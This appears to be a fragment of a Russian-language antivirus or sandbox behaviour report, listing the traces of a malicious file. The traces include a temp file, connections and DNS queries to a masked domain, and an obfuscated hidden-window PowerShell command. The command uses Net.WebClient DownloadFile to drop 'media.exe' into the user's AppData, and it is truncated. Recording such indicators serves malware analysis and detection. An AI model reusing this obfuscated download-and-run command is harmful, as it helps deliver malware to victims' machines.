Техническая информация
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1496
- %TEMP%\798647.cvr
- 'em####visioninc.xyz':80
- DNS ASK em####visioninc.xyz
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $MMMMMM='C:\Users\'+ $env:UserNaMe +'\AppData\media.exe';((n`e`W`-obj`e`c`T (('N'+'e'+'t'+'.'+'W'+'e'+'b'+'c'+'l'+'i'+'e'+'n'+'t'))).(('D'+'o'+'w'+'n'+'l'+'o'+'a'+'d'+'F'+'i'+'l'+'e')).invoke((...' (со скрытым окном)